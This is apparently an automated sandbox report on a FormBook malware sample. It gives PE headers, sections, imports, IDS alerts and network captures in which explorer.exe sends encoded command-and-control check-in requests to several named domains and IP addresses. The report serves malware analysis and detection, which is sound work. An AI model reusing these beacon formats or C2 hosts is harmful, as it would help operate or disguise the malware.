call dword ptr [004510E8h]
call 00007FC6445AB0D1h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007FC6445A6788h
movzx eax, word ptr [ebp+00h]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[C++] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x65620	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x75055	0x1c	.zrjfv
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x558	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x50000	0x50000	False	0.539175415039	data	6.35769619618	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x17000	0x17000	False	0.550239894701	data	6.611499798	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x68000	0xb848	0x8000	False	0.738403320312	data	6.93245568667	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.zrjfv	0x74000	0x28ee9	0x29000	False	0.950373951982	PGP\011Secret Sub-key -	7.98479058964	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
OPENGL32.dll	glGenTextures, glBindTexture, glTexParameteri, glTexImage2D, glBegin, glArrayElement
KERNEL32.dll	RtlUnwind, HeapAlloc, HeapFree, HeapReAlloc, GetTimeZoneInformation, GetSystemTime, GetLocalTime, GetStartupInfoA, GetCommandLineA, ExitProcess, RaiseException, TerminateProcess, HeapSize, GetACP, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, IsBadReadPtr, IsBadCodePtr, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, SetFileTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetProfileStringA, GetDiskFreeSpaceExA, GetVolumeInformationA, GetDriveTypeA, VirtualProtect, GetProcAddress, GetModuleHandleA, lstrcpyA, GlobalDeleteAtom, GlobalFindAtomA, GlobalAddAtomA, lstrcmpiA, GlobalGetAtomNameA, GetCurrentThreadId, lstrcatA, GetVersion, LockResource, LoadResource, FindResourceA, FreeLibrary, LoadLibraryA, InterlockedIncrement, InterlockedDecrement, lstrlenA, WideCharToMultiByte, MultiByteToWideChar, SetLastError, MulDiv, GlobalUnlock, GlobalLock, lstrcpynA, GetLastError, LocalFree, FormatMessageA, GlobalFree, GetCurrentThread, lstrcmpA, GlobalAlloc, GetModuleFileNameA, GetFileTime, GetFileSize, GetFileAttributesA, GetTickCount, FileTimeToLocalFileTime, FileTimeToSystemTime, GetFullPathNameA, FindFirstFileA, FindClose, DeleteFileA, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, CreateFileA, GetCurrentProcess, DuplicateHandle, SetErrorMode, GetThreadLocale, GetCurrentDirectoryA, WritePrivateProfileStringA, SizeofResource, GetOEMCP, GetCPInfo, GetProcessVersion, GlobalFlags, TlsGetValue, LocalReAlloc, TlsSetValue, EnterCriticalSection, GlobalReAlloc, LeaveCriticalSection, TlsFree, GlobalHandle, DeleteCriticalSection, TlsAlloc, InitializeCriticalSection, LocalAlloc, CloseHandle
USER32.dll	MessageBeep, CharUpperA, RegisterClipboardFormatA, PostThreadMessageA, LoadStringA, DestroyMenu, GetSysColorBrush, LoadCursorA, GetDesktopWindow, PtInRect, GetClassNameA, MapDialogRect, SetWindowContextHelpId, GetMessageA, TranslateMessage, ValidateRect, GetCursorPos, SetCursor, PostQuitMessage, EndDialog, GetActiveWindow, CreateDialogIndirectParamA, GrayStringA, DrawTextA, TabbedTextOutA, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuA, SetMenuItemBitmaps, CheckMenuItem, EnableMenuItem, GetNextDlgGroupItem, IsWindowEnabled, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, PostMessageA, UpdateWindow, SendDlgItemMessageA, MapWindowPoints, GetSysColor, PeekMessageA, DispatchMessageA, GetFocus, SetActiveWindow, IsWindow, SetFocus, AdjustWindowRectEx, ScreenToClient, CopyRect, IsWindowVisible, InflateRect, FillRect, GetClientRect, UnregisterClassA, LoadBitmapA, HideCaret, ShowCaret, ExcludeUpdateRgn, GetTopWindow, MessageBoxA, IsChild, GetParent, GetCapture, WinHelpA, wsprintfA, GetClassInfoA, RegisterClassA, GetMenu, GetMenuItemCount, GetSubMenu, SetRect, CopyAcceleratorTableA, CharNextA, GetNextDlgTabItem, GetMenuItemID, DrawFocusRect, DefDlgProcA, IsWindowUnicode, InvalidateRect, EnableWindow, GetSystemMetrics, DrawIcon, SendMessageA, IsIconic, LoadIconA, GetWindowRect, GetWindowPlacement, SystemParametersInfoA, IntersectRect, OffsetRect, RegisterWindowMessageA, SetWindowPos, SetWindowLongA, GetWindowLongA, GetWindow, SetForegroundWindow, GetForegroundWindow, GetLastActivePopup, GetMessagePos, GetMessageTime, RemovePropA, CallWindowProcA, GetPropA, UnhookWindowsHookEx, SetPropA, GetClassLongA, CallNextHookEx, SetWindowsHookExA, CreateWindowExA, DestroyWindow, GetDlgItem, GetWindowTextLengthA, GetWindowTextA, GetDlgCtrlID, GetKeyState, DefWindowProcA
GDI32.dll	GetStockObject, SetBkMode, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, IntersectClipRect, DeleteObject, SelectObject, GetDeviceCaps, GetViewportExtEx, GetWindowExtEx, CreatePen, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, GetMapMode, PatBlt, DPtoLP, GetTextColor, GetBkColor, LPtoDP, RestoreDC, SaveDC, DeleteDC, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, LineDDA, Pie, CreateFontA, CreateDIBitmap, GetTextExtentPointA, BitBlt, CreateCompatibleDC, CreateSolidBrush
comdlg32.dll	GetFileTitleA
WINSPOOL.DRV	DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll	RegCloseKey, RegSetValueExA, RegOpenKeyExA, RegCreateKeyExA
COMCTL32.dll
oledlg.dll
ole32.dll	CoFreeUnusedLibraries, CoRegisterMessageFilter, OleInitialize, CoTaskMemAlloc, CoTaskMemFree, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoRevokeClassObject, OleFlushClipboard, OleIsCurrentClipboard, OleUninitialize
OLEPRO32.DLL
OLEAUT32.dll	SysFreeString, SysAllocStringLen, VariantClear, VariantTimeToSystemTime, VariantCopy, VariantChangeType, SysAllocString, SysAllocStringByteLen, SysStringLen

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/28/21-07:40:49.415574	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
10/28/21-07:40:50.437941	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
10/28/21-07:41:05.196993	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
10/28/21-07:41:15.703875	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.2.3	198.54.116.195
10/28/21-07:41:15.703875	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.2.3	198.54.116.195
10/28/21-07:41:15.703875	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49819	80	192.168.2.3	198.54.116.195

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2021 07:40:40.780981064 CEST	49814	80	192.168.2.3	154.216.113.38
Oct 28, 2021 07:40:41.056339025 CEST	80	49814	154.216.113.38	192.168.2.3
Oct 28, 2021 07:40:41.056490898 CEST	49814	80	192.168.2.3	154.216.113.38
Oct 28, 2021 07:40:41.056646109 CEST	49814	80	192.168.2.3	154.216.113.38
Oct 28, 2021 07:40:41.349755049 CEST	80	49814	154.216.113.38	192.168.2.3
Oct 28, 2021 07:40:41.349797010 CEST	80	49814	154.216.113.38	192.168.2.3
Oct 28, 2021 07:40:41.349965096 CEST	49814	80	192.168.2.3	154.216.113.38
Oct 28, 2021 07:40:41.350013971 CEST	49814	80	192.168.2.3	154.216.113.38
Oct 28, 2021 07:40:41.624960899 CEST	80	49814	154.216.113.38	192.168.2.3
Oct 28, 2021 07:40:53.448934078 CEST	49816	80	192.168.2.3	198.187.31.159
Oct 28, 2021 07:40:53.610605955 CEST	80	49816	198.187.31.159	192.168.2.3
Oct 28, 2021 07:40:53.610744953 CEST	49816	80	192.168.2.3	198.187.31.159
Oct 28, 2021 07:40:53.611085892 CEST	49816	80	192.168.2.3	198.187.31.159
Oct 28, 2021 07:40:53.773292065 CEST	80	49816	198.187.31.159	192.168.2.3
Oct 28, 2021 07:40:53.773339987 CEST	80	49816	198.187.31.159	192.168.2.3
Oct 28, 2021 07:40:53.773664951 CEST	49816	80	192.168.2.3	198.187.31.159
Oct 28, 2021 07:40:53.773725033 CEST	49816	80	192.168.2.3	198.187.31.159
Oct 28, 2021 07:40:53.935348034 CEST	80	49816	198.187.31.159	192.168.2.3
Oct 28, 2021 07:40:58.836782932 CEST	49817	80	192.168.2.3	5.157.87.204
Oct 28, 2021 07:40:58.862085104 CEST	80	49817	5.157.87.204	192.168.2.3
Oct 28, 2021 07:40:58.862193108 CEST	49817	80	192.168.2.3	5.157.87.204
Oct 28, 2021 07:40:58.862319946 CEST	49817	80	192.168.2.3	5.157.87.204
Oct 28, 2021 07:40:58.887377024 CEST	80	49817	5.157.87.204	192.168.2.3
Oct 28, 2021 07:40:58.888703108 CEST	80	49817	5.157.87.204	192.168.2.3
Oct 28, 2021 07:40:58.888719082 CEST	80	49817	5.157.87.204	192.168.2.3
Oct 28, 2021 07:40:58.888940096 CEST	49817	80	192.168.2.3	5.157.87.204
Oct 28, 2021 07:40:58.889030933 CEST	49817	80	192.168.2.3	5.157.87.204
Oct 28, 2021 07:40:58.914078951 CEST	80	49817	5.157.87.204	192.168.2.3
Oct 28, 2021 07:41:10.173774958 CEST	49818	80	192.168.2.3	198.54.117.215
Oct 28, 2021 07:41:10.336358070 CEST	80	49818	198.54.117.215	192.168.2.3
Oct 28, 2021 07:41:10.336536884 CEST	49818	80	192.168.2.3	198.54.117.215
Oct 28, 2021 07:41:10.336775064 CEST	49818	80	192.168.2.3	198.54.117.215
Oct 28, 2021 07:41:10.503941059 CEST	80	49818	198.54.117.215	192.168.2.3
Oct 28, 2021 07:41:10.503973961 CEST	80	49818	198.54.117.215	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2021 07:40:40.391122103 CEST	56527	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:40:40.767874002 CEST	53	56527	8.8.8.8	192.168.2.3
Oct 28, 2021 07:40:46.361264944 CEST	52650	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:40:47.373327971 CEST	52650	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:40:48.404741049 CEST	52650	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:40:48.409805059 CEST	53	52650	8.8.8.8	192.168.2.3
Oct 28, 2021 07:40:49.415467024 CEST	53	52650	8.8.8.8	192.168.2.3
Oct 28, 2021 07:40:50.437834978 CEST	53	52650	8.8.8.8	192.168.2.3
Oct 28, 2021 07:40:53.424590111 CEST	63297	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:40:53.447602987 CEST	53	63297	8.8.8.8	192.168.2.3
Oct 28, 2021 07:40:58.803464890 CEST	58361	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:40:58.835072994 CEST	53	58361	8.8.8.8	192.168.2.3
Oct 28, 2021 07:41:03.898623943 CEST	53615	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:41:04.906097889 CEST	53615	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:41:05.139462948 CEST	53	53615	8.8.8.8	192.168.2.3
Oct 28, 2021 07:41:05.196773052 CEST	53	53615	8.8.8.8	192.168.2.3
Oct 28, 2021 07:41:10.148940086 CEST	50728	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:41:10.172621965 CEST	53	50728	8.8.8.8	192.168.2.3
Oct 28, 2021 07:41:15.516916037 CEST	53777	53	192.168.2.3	8.8.8.8
Oct 28, 2021 07:41:15.540014029 CEST	53	53777	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 28, 2021 07:40:49.415574074 CEST	192.168.2.3	8.8.8.8	cff9	(Port unreachable)	Destination Unreachable
Oct 28, 2021 07:40:50.437941074 CEST	192.168.2.3	8.8.8.8	cff9	(Port unreachable)	Destination Unreachable
Oct 28, 2021 07:41:05.196993113 CEST	192.168.2.3	8.8.8.8	d031	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 28, 2021 07:40:40.391122103 CEST	192.168.2.3	8.8.8.8	0x7892	Standard query (0)	www.jntycy.com	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:46.361264944 CEST	192.168.2.3	8.8.8.8	0x769a	Standard query (0)	www.knowsyourdream.com	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:47.373327971 CEST	192.168.2.3	8.8.8.8	0x769a	Standard query (0)	www.knowsyourdream.com	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:48.404741049 CEST	192.168.2.3	8.8.8.8	0x769a	Standard query (0)	www.knowsyourdream.com	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:53.424590111 CEST	192.168.2.3	8.8.8.8	0xd795	Standard query (0)	www.publiccoins.online	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:58.803464890 CEST	192.168.2.3	8.8.8.8	0x6e00	Standard query (0)	www.thebrandstudiointernational.com	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:03.898623943 CEST	192.168.2.3	8.8.8.8	0xad6d	Standard query (0)	www.hcbg.online	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:04.906097889 CEST	192.168.2.3	8.8.8.8	0xad6d	Standard query (0)	www.hcbg.online	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:10.148940086 CEST	192.168.2.3	8.8.8.8	0x315c	Standard query (0)	www.theravewizards.com	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:15.516916037 CEST	192.168.2.3	8.8.8.8	0x7662	Standard query (0)	www.mylyk.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 28, 2021 07:40:40.767874002 CEST	8.8.8.8	192.168.2.3	0x7892	No error (0)	www.jntycy.com		154.216.113.38	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:48.409805059 CEST	8.8.8.8	192.168.2.3	0x769a	Server failure (2)	www.knowsyourdream.com	none	none	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:49.415467024 CEST	8.8.8.8	192.168.2.3	0x769a	Server failure (2)	www.knowsyourdream.com	none	none	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:50.437834978 CEST	8.8.8.8	192.168.2.3	0x769a	Server failure (2)	www.knowsyourdream.com	none	none	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:53.447602987 CEST	8.8.8.8	192.168.2.3	0xd795	No error (0)	www.publiccoins.online	publiccoins.online		CNAME (Canonical name)	IN (0x0001)
Oct 28, 2021 07:40:53.447602987 CEST	8.8.8.8	192.168.2.3	0xd795	No error (0)	publiccoins.online		198.187.31.159	A (IP address)	IN (0x0001)
Oct 28, 2021 07:40:58.835072994 CEST	8.8.8.8	192.168.2.3	0x6e00	No error (0)	www.thebrandstudiointernational.com	thebrandstudiointernational.com		CNAME (Canonical name)	IN (0x0001)
Oct 28, 2021 07:40:58.835072994 CEST	8.8.8.8	192.168.2.3	0x6e00	No error (0)	thebrandstudiointernational.com		5.157.87.204	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:05.139462948 CEST	8.8.8.8	192.168.2.3	0xad6d	Name error (3)	www.hcbg.online	none	none	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:05.196773052 CEST	8.8.8.8	192.168.2.3	0xad6d	Name error (3)	www.hcbg.online	none	none	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:10.172621965 CEST	8.8.8.8	192.168.2.3	0x315c	No error (0)	www.theravewizards.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Oct 28, 2021 07:41:10.172621965 CEST	8.8.8.8	192.168.2.3	0x315c	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:10.172621965 CEST	8.8.8.8	192.168.2.3	0x315c	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:10.172621965 CEST	8.8.8.8	192.168.2.3	0x315c	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:10.172621965 CEST	8.8.8.8	192.168.2.3	0x315c	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:10.172621965 CEST	8.8.8.8	192.168.2.3	0x315c	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:10.172621965 CEST	8.8.8.8	192.168.2.3	0x315c	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:10.172621965 CEST	8.8.8.8	192.168.2.3	0x315c	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Oct 28, 2021 07:41:15.540014029 CEST	8.8.8.8	192.168.2.3	0x7662	No error (0)	www.mylyk.net	mylyk.net		CNAME (Canonical name)	IN (0x0001)
Oct 28, 2021 07:41:15.540014029 CEST	8.8.8.8	192.168.2.3	0x7662	No error (0)	mylyk.net		198.54.116.195	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.jntycy.com

www.publiccoins.online

www.thebrandstudiointernational.com

www.theravewizards.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49814	154.216.113.38	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 28, 2021 07:40:41.056646109 CEST	5993	OUT	GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE HTTP/1.1 Host: www.jntycy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2021 07:40:41.349755049 CEST	5995	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/8.5 X-Powered-By: PHP/5.6.40 X-Powered-By: ASP.NET Date: Thu, 28 Oct 2021 05:40:36 GMT Connection: close Content-Length: 1260 Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e6 b8 b8 e6 88 8f e5 ae 98 e7 bd 91 e4 b8 8b e8 bd bd 5f e7 bd 91 e7 ab 99 0d 0a 22 3e 0d 0a 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 35 31 38 36 36 39 66 30 64 33 31 65 34 31 35 30 38 62 65 30 62 61 62 66 35 61 38 66 63 32 38 22 3b 0d 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0d 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><link rel="icon" href="/favicon.ico" type="image/x-icon"/><title>_</title><meta name="keywords" content="_"> <meta name="description"content="_"><meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertB

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49816	198.187.31.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 28, 2021 07:40:53.611085892 CEST	6005	OUT	GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB HTTP/1.1 Host: www.publiccoins.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 28, 2021 07:40:53.773292065 CEST	6007	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Thu, 28 Oct 2021 05:40:53 GMT server: LiteSpeed location: https://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 